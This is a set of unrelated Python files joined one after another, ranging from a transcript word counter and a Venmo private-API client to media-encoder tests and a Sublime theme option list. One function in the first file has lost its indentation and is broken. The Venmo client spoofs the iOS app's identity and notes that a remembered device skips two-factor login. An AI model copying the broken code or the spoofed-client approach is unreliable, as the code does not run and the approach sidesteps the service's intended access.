# and sumNumOfWordsPsych())
psychInf = {}         # informant id -> psych type
infWords = {}         # informant id -> list of words
comWords = {}         # communicant id -> list of words
markWords = {}        # unused here; kept for compatibility
numOfWordsInf = {}    # informant id -> word count
numOfWordsCom = {}    # communicant id -> word count
numMarkWords = {}     # unused here; kept for compatibility
numOfWordsPsych = {}  # psych type -> total word count
infReplicas = {}      # informant id -> list of replica lines
comReplicas = {}      # communicant id -> list of replica lines
def readInfWords(text):
    """Normalize a transcript and fill the module-level dictionaries.

    Strips markup (timestamps, paralinguistic signs, punctuation), splits the
    text into speaker-tagged lines, and accumulates replicas and word counts
    per informant (s/и ids) and per communicant (m/w/м/р/ж ids).
    NOTE: the regex substitutions below are order-dependent — do not reorder.
    """
    print "readInfWords()"
    # print "first", text[0:10]
    # text normalization
    # - lowercase
    # - remove all markup signs (time,paralinguistic signs with *)
    #clearData = re.sub(u"\w", "", text)
    #clearData = re.sub(u'[^\x00-\x7f]', '', clearData)
    clearData = re.sub(u"\r", "\n", text)
    #print "CLEAR 1 DATA start <", clearData, "> CLEAR DATA end"
    clearData = re.sub(u"/", "", clearData)
    clearData = re.sub(u"ord[0-9a-zA-Zа-яА-Я-]*([^0-9a-zA-Zа-яА-Я-])[ 0-9]*", "", clearData)
    clearData = re.sub(u"\*[а-яА-Я]+", "", clearData)
    clearData = re.sub(u"/", "", clearData)
    # Remove hh:mm:ss.ms timestamps.
    clearData = re.sub(u'[0-9]*:[0-9]+:[0-9]+\.[0-9]+', "", clearData)
    clearData = re.sub(u"@", "", clearData)
    clearData = re.sub(u"\?", "", clearData)
    clearData = re.sub(u"\!", "", clearData)
    clearData = re.sub(u"\(", "", clearData)
    clearData = re.sub(u"\)", "", clearData)
    clearData = re.sub(u"\+", "", clearData)
    clearData = re.sub(u"\:", "", clearData)
    clearData = re.sub(u"\.", "", clearData)
    clearData = re.sub(u"#", " ", clearData)
    clearData = re.sub(u"\*.", "", clearData)
    # Normalize Cyrillic informant tags ("и12") to Latin ("s12") and put each
    # speaker tag at the start of its own line.
    clearData = re.sub(u"и(\d+)", "s\\1", clearData)
    clearData = re.sub(u"(s\d+)","\n\\1 ", clearData)
    # Collapse whitespace.
    clearData = re.sub(u"[ \t]+"," ", clearData)
    clearData = re.sub(u"\n ","\n", clearData)
    clearData = re.sub(u" \n","\n", clearData)
    clearData = re.sub(u"\n+","\n", clearData)
    # Drop residual annotation keywords from the transcript header.
    clearData = re.sub(u"frase-","", clearData)
    clearData = re.sub(u"speaker","", clearData)
    clearData = re.sub(u"frase","", clearData)
    clearData = re.sub(u"begin time","", clearData)
    clearData = re.sub(u" - ","", clearData)
    clearData = re.sub(u"hhmmssms","", clearData)
    clearData = re.sub(u"<с>","", clearData)
    clearData = re.sub(u"<к>","", clearData)
    #print clearData
    # - define informant|communicant
    infMatcher= ""
    comMatcher = ""
    info = ""
    comm = ""
    lastPerson = ""
    # Informant ids look like s12/и12; communicant ids like m1/w1/м1/р1/ж1.
    infMatch = re.compile(u'([sи][0-9]+).*')
    comMatch = re.compile(u'([mwмрж][0-9]+).*')
    for line in clearData.split("\n"):
        #print "L: <%s>" % (line)
        #matching for informants and communicants
        isPersonFoundInLine = False
        infMatcher = infMatch.search(line)
        comMatcher = comMatch.search(line)
        if infMatcher:
            lastPerson = "informant"
            info = infMatcher.group(1)
            #print "New informant was found:", info
            isPersonFoundInLine = True
            if not info in numOfWordsInf:
                numOfWordsInf[info] = 0
                infWords[info] = []
                infReplicas[info] = []
        if comMatcher:
            lastPerson = "communicant"
            comm = comMatcher.group(1)
            #print "New communicant was found:", comm
            isPersonFoundInLine = True
            if not comm in numOfWordsCom:
                numOfWordsCom[comm] = 0
                comWords[comm] = []
                comReplicas[comm] = []
        #if isPersonFoundInLine == False:
            #print "Person is not found in line:", line
        #1. add a new dict with a key = Inf, value = list of replics
        #2. delete the loop with words, NumOfWords + number of words in line
        #print replica
        #FIXME
        words = line.split()
        # Attribute the replica line to whoever spoke last, unless the line
        # is just the bare informant id.
        if line != info:
            #if line == comm:
            #    if len(words) > 0 :
            #        print "First word is: %s"% (words[0])
            #        print "Line content is: %s"% (" ".join(words[1:]))
            #    print words
            #    print len(words)
            if lastPerson == "informant":
                infReplicas[info].append(line)
            elif lastPerson == "communicant":
                comReplicas[comm].append(line)
        #    if word != info and word != comm:
        #        if lastPerson == "informant":
        #            numOfWordsInf[info] += 1
        #            infWords[info].append(word)
        #            #print "Number of words for %s = %s For word = {%s}" %(info, numOfWordsInf, word)
        #        elif lastPerson == "communicant":
        #            numOfWordsCom[comm] += 1
        #            comWords[comm].append(word)
        # Count every word except the speaker tags themselves.
        for word in line.split(" "):
            #print word
            if word != info and word != comm:
                if lastPerson == "informant":
                    numOfWordsInf[info] += 1
                    infWords[info].append(word)
                    #print "Number of words for %s = %s For word = {%s}" %(info, numOfWordsInf, word)
                elif lastPerson == "communicant":
                    numOfWordsCom[comm] += 1
                    comWords[comm].append(word)
                    #print "Number of words for %s = %s For word = {%s}" %(comm, numOfWordsCom, word)
    for key in numOfWordsInf:
        print "%-4s = %-3d words" % (key, numOfWordsInf[key])
    #sorted_dict = sorted(numOfWordsInf, key = numOfWordsInf.get, reverse = True)
    #print sorted_dict
    #sorted_dict = sorted(numOfWordsInf.items(), key = lambda x:x[1])
    #print sorted_dict
    #for key in numOfWordsCom:
        #print "%-4s = %-3d words" % (key, numOfWordsCom[key])
    #    else:
    #        print "Error with", info
    #print "Found matcher:", infMatcher.group(1)
    #print "Found matcher:", infMatcher.group(1)
    # - compose full replica
    # - tokenize replicas by spaces and punctuation
    # - distribute words by dictionaries infWords and comWords
    # - count them in numOfWordsInf and numOfWordsCom
def sumNumOfWordsPsych():
    """Load the informant->psychotype table and aggregate word counts per type.

    Fills psychInf from psychFile (tab/newline separated id, type pairs),
    then sums numOfWordsInf into numOfWordsPsych keyed by psychotype.
    """
    print "sumNumOfWordsPsych()"
    # read psychtype from file
    tFile = open(psychFile, "rt")
    text = tFile.read().decode("Windows 1251").lower()
    #print text
    data = re.split(u'\t|\n', text)
    len_data = len(data)
    # The file flattens to an alternating (informant id, type) sequence.
    for i in range(0,len_data,2):
        infNum = data[i]
        if infNum == "":
            continue
        pType = data[i+1]
        #print " Info:%s Psy:%s " % (infNum, pType)
        psychInf[infNum] = pType
    #get psychtype for every informant and add to numOfWordsPsych
    for infNum in numOfWordsInf:
        if infNum in psychInf:
            pType = psychInf[infNum]
            numWords = numOfWordsInf[infNum]
            if pType not in numOfWordsPsych:
                numOfWordsPsych[pType] = 0
            #print "add",numWords, "words for informant", infNum, "which is", pType
            numOfWordsPsych[pType] += numWords
    for key, value in numOfWordsPsych.iteritems():
        print value, " for ", key
        #print " %s %d words = " % (key.encode("UTF-8"),numOfWordsPsych[key])
    #numOfWordsPsych[pType] += numOfWordsInf
    #if infNum not in numOfWordsInf[infNum]:
    #numOfWordsPsych[pType] = 0
    #if info in data
    # count number of words by psychotype in numOfWordsPsych
def printResult():
    """Print every informant's collected replicas, one banner block per key.

    The commented-out dumps below are kept for ad-hoc debugging of the other
    module-global accumulators (word lists, counters, communicant replicas).
    """
    print "printResult()"
    # print psychInf
    # print infWords
    #for key in infWords:
    #    if key != "s125":
    #        continue
    #    #print "================================", key, "\n", " ".join(infWords[key])
    #for key in comWords:
    #    if key != "m1":
    #        continue
    #    #print "================================", key, "\n", " ".join(comWords[key])
    for key in infReplicas:
        #print "================================", key, "\n\n", infReplicas[key]
        print "================================", key, "\n", "\n".join(infReplicas[key])
    # for key in comReplicas:
    #     #print "================================", key, "\n\n", comReplicas[key]
    #     print "================================", key, "\n", "\n".join(comReplicas[key])
    # print comWords
    # print markWords
    # print numOfWordsInf
    # print numOfWordsCom
    # print numMarkWords
    # print numOfWordsPsych
    # print infReplicas
def repFilter():
print "-------------------"
for key in infReplicas:
if key in psychInf:
for line in infReplicas[key]:
if re.match(mask, line):
# print " ============= PType: %s " % (psychInf[key])
# print " ============= Informant: %s " % (key)
# print " ============= Replicas: %s " % (line)
print "%s\t %s \t%s" % (psychInf[key], key, line)
# Driver: tally words per speaker for every corpus file, then aggregate the
# counts by psychotype and dump/filter the collected replicas.
for fileName in textFile:
    print "========================= Opening file ",fileName
    textOpen = open(fileName,"rt")
    # Corpus files are UTF-8; all analysis is done on lowercase unicode.
    text = textOpen.read().decode("UTF-8").lower()
    #print "========================= first", text
    #print "..."
    readInfWords(text)
sumNumOfWordsPsych()
printResult()
repFilter()
|
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 12 23:49:52 2018
@author: koyyk_000
"""
#given S
#
#for i=1:3
#
# split S into S_train (80%) and S_test (20%)
#
# train Classifier 1 using S_train with cross-validation, report Classifier 1's cross-validation errors (S_train) and test error (S_test)
#
# train Classifier 2 using S_train with cross-validation, report Classifier 2's cross-validation errors (S_train) and test error (S_test)
#
# train Classifier 3 using S_train with cross-validation, report Classifier 3's cross-validation errors (S_train) and test error (S_test)
#
#end
#
#compute the averaged test error for Classifier 1
#
#compute the averaged test error for Classifier 2
#
#compute the averaged test error for Classifier 3 |
import logging
from six.moves import input
from django.core.management import BaseCommand, CommandError, call_command
from elasticsearch_dsl import connections
from stretch import stretch_app
class Command(BaseCommand):
    """
    Update Elasticsearch Documents
    """

    can_import_settings = True

    def add_arguments(self, parser):
        """Register the --indices and --since command-line options."""
        parser.add_argument(
            '--indices',
            action='append',
            default=[],
            help='One or more indices to operate on, by index name'
        )
        parser.add_argument(
            '--since',
            action='store',
            default=None,
            help='(Optional) Select objects modified since this date. YYYY-MM-DD'
        )

    def handle(self, *args, **options):
        """Delegate to the `stretch` command's update_documents action."""
        call_command(
            'stretch',
            'update_documents',
            indices=options.get('indices'),
            since=options.get('since'),
        )
|
from gym_SnakeGame.envs.SnakeGame import SnakeGameEnv
|
#!/usr/bin/python3
import os
import requests
import configparser
class Venmo:
    """Thin client for Venmo's private mobile API, impersonating the iOS app.

    Two hosts are used, matching the original app traffic:
      * ``venmo.com``      -- legacy "v5" web API
      * ``api.venmo.com``  -- "v1" API

    Call :meth:`login` first; it populates the account attributes and the
    OAuth bearer token that every other method sends.
    """

    # User-Agent of the impersonated app build; shared by every request.
    _USER_AGENT = 'Venmo/7.8.1 (iPhone; iOS 10.2; Scale/2.0)'

    def __init__(self):
        self.session = requests.session()
        # Account fields; populated by login() / get_me().
        self.username = None
        self.phone_number = None
        self.name = None
        self.access_token = None
        self.balance = None
        self.id = None
        self.email = None
        self.external_id = None
        # Static device fingerprint; a "remembered" device skips 2FA.
        self.device_id = 'EFF75587-5CB7-432B-BB59-639820DFD2DD'

    def _headers(self, host):
        """Build the header set shared by every authenticated JSON call.

        :param host: value for the HTTP Host header
                     ('venmo.com' or 'api.venmo.com')
        :return: dict of request headers including the OAuth bearer token
        """
        return {
            'Host': host,
            'Connection': 'keep-alive',
            'device-id': self.device_id,
            'Accept': 'application/json; charset=utf-8',
            'User-Agent': self._USER_AGENT,
            'Accept-Language': 'en-US;q=1.0',
            'Authorization': f'Bearer {self.access_token}',
            'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
        }

    def _get_json(self, url, host, params=None):
        """GET *url* with the standard auth headers and return parsed JSON.

        :param url: absolute endpoint URL
        :param host: Host header value to send (see :meth:`_headers`)
        :param params: optional dict of query-string parameters
        :raises requests.HTTPError: on any non-2xx response
        """
        response = self.session.get(url, params=params, headers=self._headers(host))
        response.raise_for_status()
        return response.json()

    def login(self, username, password):
        """Authenticate and populate the account attributes.

        :param username: username, email or phone number
        :param password: account password
        """
        headers = {
            'Host': 'venmo.com',
            'Content-Type': 'application/json; charset=utf-8',
            'Connection': 'keep-alive',
            'device-id': self.device_id,
            'Accept': 'application/json; charset=utf-8',
            'User-Agent': self._USER_AGENT,
            'Accept-Language': 'en-US;q=1.0',
            'Accept-Encoding': 'gzip;q=1.0,compress;q=0.5'
        }
        payload = {
            "client_id": "1",
            "password": password,
            "phone_email_or_username": username
        }
        # TODO handle new devices and 2fa - Venmo-Otp-Secret in response headers
        response = self.session.post('https://venmo.com/api/v5/oauth/access_token',
                                     json=payload, headers=headers)
        if response.status_code == 401:
            # 401 signals that a two-factor challenge is required.
            csrftoken = response.headers['Set-Cookie'].split('csrftoken2=')[-1].split(';')[0]
            self.two_factor_auth(response.headers['Venmo-Otp-Secret'], csrftoken)
            # TODO need to class variable declarations if 2fa needed - 'response'
        # Parse the body once instead of re-decoding it per field.
        data = response.json()
        self.username = data['username']
        self.phone_number = data['phone']
        self.name = data['name']
        self.access_token = data['access_token']
        self.balance = data['balance']
        self.id = data['id']
        self.email = data['email']
        # Fetch the profile to learn external_id (needed by several endpoints).
        self.get_me()

    def two_factor_auth(self, otp_secret, csrftoken):
        """Walk the SMS two-factor flow; prompts on stdin for the SMS code.

        :param otp_secret: Venmo-Otp-Secret header from the 401 login response
        :param csrftoken: csrftoken2 cookie value from the 401 login response
        """
        # TODO I'm in Canada will flesh this out when I'm back state-side
        headers = {
            'Host': 'venmo.com',
            'Accept-Encoding': 'gzip, deflate',
            'Connection': 'keep-alive',
            'device-id': self.device_id,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'User-Agent': self._USER_AGENT,
            'Accept-Language': 'en-us',
            'Referer': 'https://venmo.com/',
            'Venmo-Otp-Secret': otp_secret,
            'Venmo-User-Agent': self._USER_AGENT
        }
        # Need to go here first otherwise api call results in 400 Client error
        response = self.session.get('https://venmo.com/two-factor', headers=headers)
        response.raise_for_status()
        del headers['device-id']
        del headers['Venmo-User-Agent']
        del headers['Venmo-Otp-Secret']
        headers['Accept'] = 'application/json'
        headers['venmo-otp-secret'] = otp_secret
        response = self.session.get('https://venmo.com/api/v5/two_factor/token', headers=headers)
        response.raise_for_status()
        response.json()  # braintree stuff and security
        # send sms
        headers = {
            'Host': 'venmo.com',
            'Accept': 'application/json',
            'Accept-Language': 'en-us',
            'Accept-Encoding': 'gzip, deflate',
            'Content-Type': 'application/json',
            'Origin': 'https://venmo.com',
            'User-Agent': self._USER_AGENT,
            'Connection': 'keep-alive',
            'Referer': 'https://venmo.com/',
            'venmo-otp-secret': otp_secret
        }
        payload = {
            "csrftoken2": csrftoken,  # should get from the set-cookie in the response headers
            "via": "sms"
        }
        response = self.session.post('https://venmo.com/api/v5/two_factor/token', json=payload, headers=headers)
        response.raise_for_status()  # response['data']['status'] == 'sent'
        # Require manual input for sms - integrate automation with google voice maybe if venmo short code supported?
        sms_code_received = input('SMS code received: ')
        headers['venmo-otp'] = sms_code_received
        payload = {
            "csrftoken2": csrftoken,  # should get from the set-cookie in the response headers
        }
        response = self.session.post('https://venmo.com/login', json=payload, headers=headers)
        response.raise_for_status()

    def get_account(self):
        """Return the full account object (v1)."""
        return self._get_json('https://api.venmo.com/v1/account', 'api.venmo.com')

    def get_alerts(self):
        """Return pending alerts/notifications (v1)."""
        return self._get_json('https://api.venmo.com/v1/alerts', 'api.venmo.com')

    def get_me(self):
        """Return the user profile (v5) and cache its ``external_id``."""
        me = self._get_json('https://venmo.com/api/v5/users/me', 'venmo.com')
        self.external_id = me['external_id']
        return me

    def get_suggested(self):
        """Return suggested users (v1)."""
        return self._get_json('https://api.venmo.com/v1/suggested', 'api.venmo.com')

    def get_authorizations(self, limit=20):
        """Return unacknowledged active/captured card authorizations (v1).

        :param limit: maximum number of records to return
        """
        query_string_params = {
            'acknowledged': False,
            'status': 'active,captured',
            'limit': limit
        }
        return self._get_json('https://api.venmo.com/v1/authorizations',
                              'api.venmo.com', params=query_string_params)

    def get_stories(self):
        """Return the friends feed of payment stories (v1)."""
        return self._get_json('https://api.venmo.com/v1/stories/target-or-actor/friends',
                              'api.venmo.com')

    def get_merchant_views(self):
        """Return merchant-payments activation views (v1)."""
        return self._get_json('https://api.venmo.com/v1/users/merchant-payments-activation-views',
                              'api.venmo.com')

    def get_hermes_whitelist(self):
        """Return the raw hermes-whitelist payload (raw bytes, not JSON-decoded)."""
        response = self.session.get('https://api.venmo.com/v1/hermes-whitelist',
                                    headers=self._headers('api.venmo.com'))
        response.raise_for_status()
        return response.content

    def search_user(self, user):
        """Search users by name/username/phone (v1).

        :param user: search query string
        """
        return self._get_json('https://api.venmo.com/v1/users', 'api.venmo.com',
                              params={'query': user})

    def get_back_accounts(self):
        """Return linked bank accounts (v5). (Method name kept as-is for
        backward compatibility, 'back' [sic])."""
        return self._get_json('https://venmo.com/api/v5/bankaccounts', 'venmo.com')

    def get_payment_methods(self):
        """Return available payment methods (v1)."""
        return self._get_json('https://api.venmo.com/v1/payment-methods', 'api.venmo.com')

    def _get_incomplete(self, action):
        """Return pending/held payments where this account is the actor.

        :param action: 'charge' for requests, 'pay' for payments
        """
        query_string_params = {
            'action': action,
            'actor': self.external_id,
            'limit': '20',
            'status': 'pending,held'
        }
        return self._get_json('https://api.venmo.com/v1/payments', 'api.venmo.com',
                              params=query_string_params)

    def get_incomplete_requests(self):
        """Return outgoing charge requests that are still pending or held."""
        return self._get_incomplete('charge')

    def get_incomplete_payments(self):
        """Return outgoing payments that are still pending or held."""
        return self._get_incomplete('pay')

    def change_password(self, old_password, new_password):
        """Change the account password.

        :param old_password: current password (required by the API)
        :param new_password: replacement password
        """
        payload = {
            "old_password": old_password,
            "password": new_password
        }
        response = self.session.put(f'https://api.venmo.com/v1/users/{self.external_id}',
                                    json=payload, headers=self._headers('api.venmo.com'))
        response.raise_for_status()
        return response.json()

    def get_remembered_devices(self):
        """Return devices remembered for 2FA purposes (v5)."""
        # NOTE(review): the original sent Host 'api.venmo.com' against a
        # venmo.com URL; preserved verbatim -- confirm which host is intended.
        return self._get_json('https://venmo.com/api/v5/devices', 'api.venmo.com')

    def forget_device(self, device_id):
        """
        :param device_id: int - user_device_id key in response of get_remembered_devices method for a given device
        """
        response = self.session.delete(f'https://venmo.com/api/v5/devices/{device_id}',
                                       headers=self._headers('venmo.com'))
        response.raise_for_status()
        return response.json()

    def change_number(self, new_number):
        """
        :params new_number: str eg. "(123) 456-7890"
        """
        # TODO I'm in Canada will flesh this out when I'm back state-side
        payload = {
            "phone": new_number
        }
        response = self.session.post('https://venmo.com/api/v5/phones', json=payload,
                                     headers=self._headers('venmo.com'))
        response.raise_for_status()
        return response.json()

    def get_blocked_users(self):
        """Return the list of users this account has blocked (v1)."""
        return self._get_json('https://api.venmo.com/v1/blocks', 'api.venmo.com')

    def _set_all_stories_audience(self, audience):
        """Retroactively set the audience of every past transaction (v5).

        :param audience: 'private' or 'friends'
        """
        response = self.session.post('https://venmo.com/api/v5/stories/each',
                                     json={"audience": audience},
                                     headers=self._headers('venmo.com'))
        response.raise_for_status()
        return response.json()

    def make_all_past_transactions_private(self):
        """Set every past transaction's audience to private."""
        return self._set_all_stories_audience("private")

    def make_all_past_transactions_viewable_by_friends(self):
        """Set every past transaction's audience to friends."""
        return self._set_all_stories_audience("friends")

    def edit_profile(self, first_name=None, last_name=None, username=None, email=None):
        """Update profile fields (v5). All parameters are sent, even if None."""
        # TODO fetch currents so that we only pass through new/updated param to the payload
        payload = {
            "email": email,
            "first_name": first_name,
            "last_name": last_name,
            "username": username
        }
        response = self.session.put('https://venmo.com/api/v5/users/me', json=payload,
                                    headers=self._headers('venmo.com'))
        response.raise_for_status()
        return response.json()

    def get_friends(self, limit=1337):
        """Return this account's friends list (v1).

        :param limit: maximum number of friends to return
        """
        return self._get_json(f'https://api.venmo.com/v1/users/{self.external_id}/friends',
                              'api.venmo.com', params={'limit': limit})

    def sign_out(self):
        """Revoke the OAuth access token (logs the session out)."""
        response = self.session.delete('https://venmo.com/api/v5/oauth/access_token',
                                       headers=self._headers('venmo.com'))
        response.raise_for_status()
        return response.json()
# Script entry: read credentials from ./config.cfg, log in and print friends.
root_directory = os.getcwd()
cfg = configparser.ConfigParser()
# Expects a [login] section with 'username' and 'password' keys.
configFilePath = os.path.join(root_directory, 'config.cfg')
cfg.read(configFilePath)
venmo = Venmo()
venmo.login(cfg.get('login', 'username'), cfg.get('login', 'password'))
print(venmo.get_friends())
|
class store(object):
    """A simple store holding a product list, a location and an owner."""

    def __init__(self, products, location, owner):
        self.products = products
        self.location = location
        self.owner = owner

    def add_product(self, new_product):
        """Append a product name; returns self to allow chaining."""
        self.products.append(new_product)
        return self

    def remove_product(self, remove_product):
        """Drop the first occurrence of the given product; returns self."""
        self.products.remove(remove_product)
        return self

    def inventory(self):
        """Print every product followed by location and owner; returns self."""
        parts = ["Product Name: " + name + "\n" for name in self.products]
        parts.append("Location: " + self.location + "\n")
        parts.append("Owner: " + self.owner + "\n")
        print("".join(parts))
        return self
|
from rest_framework import serializers
from .models import Payment
class CategorySerializer(serializers.Serializer):
    """Plain (non-model) serializer for a compensation category."""
    name = serializers.CharField(max_length=64)
    description = serializers.CharField(max_length=1024)
    url = serializers.CharField(max_length=64)
    image = serializers.FileField()
class CompensationSerializer(serializers.Serializer):
    """Plain (non-model) serializer for a compensation entry.

    `category_url` ties a compensation to its category by the category's
    `url` field rather than a relational field.
    """
    name = serializers.CharField(max_length=64)
    money = serializers.CharField(max_length=1024)
    url = serializers.CharField(max_length=64)
    requirements = serializers.CharField(max_length=2048)
    additional_info = serializers.CharField(max_length=2048)
    once_a_term = serializers.BooleanField(default=False)
    category_url = serializers.CharField(max_length=64)
class PaymentSerializer(serializers.Serializer):
    """Serializer for Payment records.

    NOTE(review): `Meta` (model/fields) is only honoured by ModelSerializer;
    on a plain `serializers.Serializer` it is ignored, so only the three
    fields declared below are (de)serialized. Confirm whether
    ModelSerializer was intended here.
    """
    money = serializers.IntegerField()
    compensation_id = serializers.SlugRelatedField(read_only=True, slug_field='name')
    date = serializers.DateField()

    class Meta:
        model = Payment
        fields = "__all__"
class StudentSerializer(serializers.Serializer):
    """Plain (non-model) serializer for a student's identity and group."""
    email = serializers.EmailField()
    name = serializers.CharField()
    surname = serializers.CharField()
    middlename = serializers.CharField()
    group = serializers.CharField()
|
###
### Copyright (C) 2018-2019 Intel Corporation
###
### SPDX-License-Identifier: BSD-3-Clause
###
from ....lib import *
from ..util import *
from .encoder import EncoderTest
class MPEG2EncoderTest(EncoderTest):
    """Base fixture for MPEG-2 VA-API encode tests."""

    def before(self):
        """Pin the codec, ffmpeg plugin and upload format, then run the
        generic encoder setup."""
        self.codec = "mpeg2"
        self.ffenc = "mpeg2_vaapi"
        self.hwupfmt = "nv12"
        super(MPEG2EncoderTest, self).before()

    def get_file_ext(self):
        """MPEG-2 elementary streams use the .m2v extension."""
        return "m2v"

    def get_vaapi_profile(self):
        """Map this test's profile name onto the VA-API profile enum name."""
        profile_map = {
            "simple": "VAProfileMPEG2Simple",
            "main": "VAProfileMPEG2Main",
        }
        return profile_map[self.profile]
# Test-case spec (inputs, reference data) for MPEG-2 encode scenarios.
spec = load_test_spec("mpeg2", "encode")

class cqp(MPEG2EncoderTest):
    """Constant-QP (CQP) rate-control encode tests for MPEG-2."""
    @platform_tags(MPEG2_ENCODE_PLATFORMS)
    @slash.requires(have_ffmpeg_mpeg2_vaapi_encode)
    @slash.parametrize(*gen_mpeg2_cqp_parameters(spec, ['main', 'simple']))
    def test(self, case, gop, bframes, qp, quality, profile):
        # ffmpeg's mpeg2_vaapi plugin exposes no quality knob, so warn & ignore.
        slash.logger.notice("NOTICE: 'quality' parameter unused (not supported by plugin)")
        vars(self).update(spec[case].copy())
        vars(self).update(
            bframes = bframes,
            case = case,
            gop = gop,
            profile = profile,
            qp = qp,
            # Tests parametrize qp on a 0..100 scale; ffmpeg expects 1..31.
            mqp = mapRange(qp, [0, 100], [1, 31]),
            rcmode = "cqp",
        )
        self.encode()
|
"""Generate N random 2-D integer points into a file named "test".

Usage: python gen.py N
Output format: first line is N, then one "x y" pair per line.
"""
import sys
from random import randint as rint

# Number of points, taken from the first CLI argument.
tmp = sys.argv[1:]
N = int(tmp[0])

# Random bounding box scaled by N; the X and Y ranges always straddle zero.
Xmin = -rint(1, N*100)
Xmax = rint(1, N*100)
Ymin = -rint(1, N*100)
Ymax = rint(1, N*100)

filename = "test"
# BUG FIX: the original opened with "w+" and relied on an explicit close();
# a context manager guarantees the handle is flushed and closed on any exit.
with open(filename, "w") as f:
    f.write(str(N) + '\n')
    for _ in range(N):
        x = rint(Xmin, Xmax)
        y = rint(Ymin, Ymax)
        f.write(str(x) + ' ' + str(y) + '\n')
|
from peewee import DateTimeField, BooleanField, ForeignKeyField
from model.BaseModel import BaseModel
from model.Mentor import Mentor
class InterviewSlot(BaseModel):
    """A bookable interview time slot belonging to a mentor."""
    start_time = DateTimeField()
    end_time = DateTimeField()
    # presumably flipped to True when a candidate books the slot -- confirm
    reserved = BooleanField()
    # NOTE(review): `related_name` is the peewee 2.x keyword (3.x renamed it
    # to `backref`) -- confirm the peewee version in use.
    mentor = ForeignKeyField(Mentor, related_name='interviewslot_mentor_id')
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from sklearn import datasets
from sklearn import svm
from sklearn.semi_supervised import label_propagation
from sklearn import decomposition
from sklearn import metrics
# Train an RBF-kernel SVM on a labelled CSV (label in column 0, features in
# the remaining columns) and report accuracy on a second labelled CSV.
train = pd.read_csv("C:/Users/ASUS/Desktop/SVM/train.csv")
X = train.values[:, 1:]   # feature columns
y = train.values[:, 0]    # label column

svmm = svm.SVC(kernel='rbf')
# BUG FIX: the original stored a meaningless (fitted_estimator, y) tuple in
# rbf_svc; SVC.fit returns the fitted estimator itself, so keep just that.
rbf_svc = svmm.fit(X, y)

test = pd.read_csv("C:/Users/ASUS/Desktop/SVM/test.csv")
X_test = test.values[:, 1:]
y_test = test.values[:, 0]

result = svmm.predict(X_test)
accuracy = metrics.accuracy_score(y_test, result)
print(accuracy)
print(result)
|
# -*- coding: utf-8 -*-
"""
Boxy Theme Presets
"""
import sublime
import sublime_plugin
from collections import OrderedDict
# Sentinel Sublime's quick panel passes to on_done when the user cancels.
NO_SELECTION = -1
# Settings file the Boxy theme options live in.
PREFERENCES = 'Preferences.sublime-settings'

# Every boolean Boxy theme option this plugin knows how to toggle/erase.
OPTIONS = [
    'theme_accent_blue',
    'theme_accent_cyan',
    'theme_accent_green',
    'theme_accent_lime',
    'theme_accent_orange',
    'theme_accent_pink',
    'theme_accent_purple',
    'theme_accent_sky',
    'theme_accent_tangerine',
    'theme_autocomplete_item_selected_colored',
    'theme_bar',
    'theme_bar_colored',
    'theme_bar_logo_atomized',
    'theme_bar_logo_materialized',
    'theme_bar_margin_top_lg',
    'theme_bar_margin_top_md',
    'theme_bar_margin_top_sm',
    'theme_bar_shadow_hidden',
    'theme_button_rounded',
    'theme_dirty_materialized',
    'theme_dirty_accent_blue',
    'theme_dirty_accent_green',
    'theme_dirty_accent_orange',
    'theme_dirty_accent_purple',
    'theme_dirty_accent_tangerine',
    'theme_dirty_accent_cyan',
    'theme_dirty_accent_lime',
    'theme_dirty_accent_pink',
    'theme_dirty_accent_sky',
    'theme_dropdown_atomized',
    'theme_dropdown_materialized',
    'theme_find_panel_atomized',
    'theme_find_panel_close_hidden',
    'theme_find_panel_font_lg',
    'theme_find_panel_font_md',
    'theme_find_panel_font_sm',
    'theme_find_panel_font_xl',
    'theme_find_panel_font_xs',
    'theme_find_panel_materialized',
    'theme_find_panel_padding_lg',
    'theme_find_panel_padding_md',
    'theme_find_panel_padding_sm',
    'theme_find_panel_padding_xl',
    'theme_find_panel_padding_xs',
    'theme_find_panel_size_lg',
    'theme_find_panel_size_md',
    'theme_find_panel_size_sm',
    'theme_find_panel_size_xl',
    'theme_find_panel_size_xs',
    'theme_font_lg',
    'theme_font_md',
    'theme_font_sm',
    'theme_font_xl',
    'theme_font_xs',
    'theme_grid_border_size_lg',
    'theme_grid_border_size_md',
    'theme_grid_border_size_sm',
    'theme_grid_border_size_xl',
    'theme_grid_border_size_xs',
    'theme_icon_button_highlighted',
    'theme_icons_atomized',
    'theme_icons_materialized',
    'theme_panel_switcher_atomized',
    'theme_panel_switcher_materialized',
    'theme_popup_border_visible',
    'theme_quick_panel_item_selected_colored',
    'theme_quick_panel_size_lg',
    'theme_quick_panel_size_md',
    'theme_quick_panel_size_sm',
    'theme_quick_panel_size_xl',
    'theme_quick_panel_size_xs',
    'theme_scrollbar_colored',
    'theme_scrollbar_line',
    'theme_scrollbar_rounded',
    'theme_sidebar_border',
    'theme_sidebar_close_always_visible',
    'theme_sidebar_disclosure',
    'theme_sidebar_file_icons_hidden',
    'theme_sidebar_folder_arrow',
    'theme_sidebar_folder_atomized',
    'theme_sidebar_folder_materialized',
    'theme_sidebar_folder_mono',
    'theme_sidebar_font_lg',
    'theme_sidebar_font_md',
    'theme_sidebar_font_sm',
    'theme_sidebar_font_xl',
    'theme_sidebar_font_xs',
    'theme_sidebar_heading_bold',
    'theme_sidebar_highlight_selected_text_only',
    'theme_sidebar_highlight_text_only',
    'theme_sidebar_icon_saturation_hg',
    'theme_sidebar_icon_saturation_lw',
    'theme_sidebar_icon_saturation_md',
    'theme_sidebar_icon_saturation_xh',
    'theme_sidebar_indent_lg',
    'theme_sidebar_indent_md',
    'theme_sidebar_indent_sm',
    'theme_sidebar_indent_top_level_disabled',
    'theme_sidebar_indent_xl',
    'theme_sidebar_indent_xs',
    'theme_sidebar_size_lg',
    'theme_sidebar_size_md',
    'theme_sidebar_size_sm',
    'theme_sidebar_size_xl',
    'theme_sidebar_size_xs',
    'theme_sidebar_size_xxs',
    'theme_size_lg',
    'theme_size_md',
    'theme_size_sm',
    'theme_size_xl',
    'theme_size_xs',
    'theme_statusbar_colored',
    'theme_statusbar_font_lg',
    'theme_statusbar_font_md',
    'theme_statusbar_font_sm',
    'theme_statusbar_font_xl',
    'theme_statusbar_font_xs',
    'theme_statusbar_label_bold',
